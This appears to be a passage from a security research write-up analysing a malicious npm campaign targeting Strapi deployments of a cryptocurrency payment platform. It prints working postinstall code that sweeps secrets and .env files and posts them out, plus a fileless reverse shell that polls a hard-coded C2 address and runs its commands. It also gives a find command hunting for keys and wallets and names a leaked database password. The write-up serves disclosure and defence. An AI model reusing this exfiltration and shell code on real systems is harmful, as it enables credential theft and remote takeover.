Published ~3 hours after v3.6.8, [email protected] is the final and most evolved payload in the campaign. It combines targeted credential theft with a fileless persistence mechanism and reveals specific details about the attacker’s intended victim.

Targeted environment paths. The hardcoded paths reveal the target’s infrastructure:

1
// package/postinstall.js ([email protected])
2
// Read .env from build context (copied by Jenkins: cp /opt/secrets/strapi-green.env ./.env)
3
var envPaths = [
4
  '.env',
5
  '../.env',
6
  '../../.env',
7
  '/app/.env',
8
  '/opt/secrets/strapi-green.env',
9
  '/opt/secrets/.env',
10
  '/var/www/nowguardarian-strapi/.env',
11
  '/var/www/nowguardarian-strapi/nowguardarian-strapi.env',
12
];

The comment referencing Jenkins and the path /opt/secrets/strapi-green.env indicate the attacker has knowledge of the target’s CI/CD pipeline. The path /var/www/nowguardarian-strapi/ references what appears to be a Strapi deployment associated with “Guardarian” — a cryptocurrency payment gateway. This is consistent with the wallet file theft in Payload 5, the direct Guardarian database probing in Payload 6, the HOT_WALLET/COLD_WALLET search in Payload 2, and the Guardarian API module exfiltration in Payload 1 — confirming that cryptocurrency theft was the campaign’s objective from the start.

Broad secrets directory sweep. The script reads every file in /opt/secrets/ and every .env file under /var/www/*/:

1
// package/postinstall.js ([email protected])
2
// Read ALL .env files in /opt/secrets/
3
try {
4
  var files = fs.readdirSync('/opt/secrets/');
5
  for (var i = 0; i < files.length; i++) {
6
    try {
7
      var c = fs.readFileSync('/opt/secrets/' + files[i], 'utf8');
8
      await p(
9
        '/build/' + ID + '/secret',
10
        JSON.stringify({ path: '/opt/secrets/' + files[i], content: c.slice(0, 50000) })
11
      );
12
    } catch (e) {}
13
  }
14
} catch (e) {}

Environment variable filtering. Unlike Payload 5’s raw env dump, this version filters out npm_-prefixed variables to reduce noise:

1
// package/postinstall.js ([email protected])
2
var env = {};
3
for (var k in process.env) if (!/^npm_/.test(k)) env[k] = process.env[k];
4
await p('/build/' + ID + '/proc-env', env);

Fileless persistent reverse shell. The most significant evolution: instead of writing a file to /tmp/ (detectable by filesystem monitoring), the script spawns a detached node -e process with the entire C2 agent passed as an inline string:

1
// package/postinstall.js ([email protected])
2
var child = cp.spawn(
3
  'node',
4
  [
5
    '-e',
6
    'var h=require("http"),e=require("child_process").execSync;function poll(){' +
7
      'h.request({hostname:"144.31.107.231",port:9999,path:"/bshell/poll",method:"POST",' +
8
      'headers:{"Content-Type":"text/plain","Content-Length":2}},function(r){' +
9
      'var d="";r.on("data",function(c){d+=c});r.on("end",function(){' +
10
      'if(d&&d.trim()&&d.trim()!="nop"){try{var o=e(d.trim(),{timeout:30000,encoding:"utf8",maxBuffer:5e6});' +
11
      'var rq=h.request({hostname:"144.31.107.231",port:9999,path:"/bshell/result",method:"POST",' +
12
      'headers:{"Content-Type":"text/plain","Content-Length":Buffer.byteLength(o)}});rq.write(o);rq.end()' +
13
      '}catch(x){}}setTimeout(poll,3000)})}).on("error",function(){setTimeout(poll,10000)}).end("{}");}poll();',
14
  ],
15
  { detached: true, stdio: 'ignore' }
16
);
17
child.unref();

No file is written to disk. The C2 agent exists only as a running process, making it invisible to file-based detection tools. It polls /bshell/poll (a new path, distinct from both Payload 5’s /c2/ and Payload 7’s /shell/ namespaces), suggesting the attacker tracks victims by payload variant on the server side.

No crontab persistence. Unlike Payload 7, this version does not install a crontab entry — the attacker traded restart survival for detection evasion. The C2 path prefix changed from /c2/ to /build/ for the beacon phase, further suggesting the attacker is compartmentalizing C2 traffic by source.

Payload Evolution Timeline

The eight payloads show a clear narrative: the attacker started aggressive (Redis RCE, Docker escape), found those approaches weren’t working, pivoted to reconnaissance and data collection, used hardcoded credentials for direct database access, and finally settled on persistent access with targeted credential theft.

Dynamic Analysis

Our Dynamic Analysis pipeline flagged strapi-plugin-events with two signals: Stage-9 secret gathering via a find command and Stage-11 C2 communication.

The following command was captured:

1
find / -maxdepth 4 ( -name *.pem -o -name *.key -o -name id_rsa* -o -name wallet* -o -name *private* -o -name *secret* ) ! -path */ssl/certs/* ! -path */node_modules/* -type f

The following are the outbound network connections recorded:

The sandbox recorded 24 outbound connections to 144.31.107.231:9999 — the hardcoded C2 server — spanning the full postinstall execution window (beacon through polling loop). The 104.16.x.34 entries are Cloudflare IPs contacted during npm package resolution.

Notable Characteristics

The campaign is specifically engineered for Strapi CMS deployments:

• All ten package names follow the strapi-plugin-* naming convention
• File paths target Strapi’s configuration directory layout (/app/config/database.js, /app/config/plugins.js)
• Environment variable paths target common Strapi Docker image conventions (/home/strapi/.env, /app/.env)
• Redis exploitation targets the default local instance commonly used as Strapi’s cache backend
• All packages skip Windows hosts, focusing exclusively on Linux servers and containers

The campaign shows signs of targeted intrusion against a specific cryptocurrency platform:

• Payload 1 exfiltrates a Guardarian API module from /app/exteranl-apis (typo matching the target’s actual directory name)
• Payload 2 searches raw disk for HOT_WALLET, COLD_WALLET, DEPOSIT_ADDRESS, and MNEMONIC
• Payload 3 gates on hostname.includes('prod'), indicating knowledge of the target’s naming convention
• Payload 6 connects to PostgreSQL using hardcoded credentials and explicitly probes for databases named guardarian, guardarian_payments, exchange, custody
• Payload 7 gates on hostname === 'prod-strapi', indicating exact knowledge of the production hostname
• Payload 8 references /var/www/nowguardarian-strapi/ and /opt/secrets/strapi-green.env
• A code comment in Payload 8 references Jenkins: // copied by Jenkins: cp /opt/secrets/strapi-green.env ./.env
• The use of a second npm account (kekylf12) for the targeted variants suggests operational compartmentalization

No obfuscation is used in any of the ten packages. The source code is readable JavaScript, suggesting the attacker prioritized speed of development over stealth. The entire eight-payload evolution — from Redis RCE to fileless persistence — happened within a single 13-hour session.

Conclusion

This campaign is a rare window into an attacker’s real-time development process. Over 13 hours, the operator published ten packages with eight distinct payloads, each iteration responding to what was likely working (or not) against their target:

1. Hours 0–1 (Payloads 1–2): Aggressive Redis RCE exploitation — crontab injection, webshell writes, SSH key injection, Docker overlay escape, raw disk reads. These techniques would be devastating against an unprotected Redis instance but require CONFIG SET to be enabled (it’s disabled by default in Redis 6+).
2. Hours 1–2 (Payload 3, published 4x): Simplified direct reverse shells — the attacker abandons Redis exploitation for straightforward bash and Python shells, suggesting the Redis approaches failed.
3. Hour 2 (Payloads 4–5): Pivot to reconnaissance — instead of trying to get a shell, the attacker collects credentials, environment variables, and secrets for later use.
4. Hour 3 (Payload 6): Direct database exploitation — the attacker uses hardcoded PostgreSQL credentials to dump Strapi data, enumerate all databases on the server, and probe for Guardarian payment and custody databases. The presence of real credentials (user_strapi / 1QKtYPp18UsyU2ZwInVM) confirms prior access to the target.
5. Hours 10–13 (Payloads 7–8): Targeted persistent access — the attacker switches to a second npm account and deploys persistent implants with specific knowledge of the target’s hostname, CI pipeline, and secrets directory layout.

The Guardarian references appear from Payload 1 onward (/app/exteranl-apis, HOT_WALLET, COLD_WALLET, MNEMONIC, guardarian_payments, /var/www/nowguardarian-strapi/), confirming that this was a targeted campaign against a cryptocurrency payment platform from the very beginning — not an opportunistic spray that became targeted over time. The hardcoded database password in Payload 6 proves this is not the attacker’s first interaction with the target’s infrastructure.

If you installed any of these ten packages, assume full compromise. Rotate all credentials accessible from the affected host, including database passwords, API keys, JWT secrets, and any private keys found on the filesystem. The PostgreSQL password 1QKtYPp18UsyU2ZwInVM must be rotated immediately if it is in use anywhere. Revoke any Kubernetes service account tokens that may have been exposed. Check for persistence mechanisms: remove /tmp/.node_gc.js, /tmp/vps_shell.sh, /tmp/redis_exec.sh, and /app/public/uploads/shell.php; audit crontab entries for node_gc or curl references; audit Redis with CONFIG GET dir to verify it hasn’t been reconfigured; and kill any orphaned node -e processes connecting to 144.31.107.231.

Use tools like vet to scan your dependency tree for malicious packages before they reach production, and pmg to block malicious packages at install time.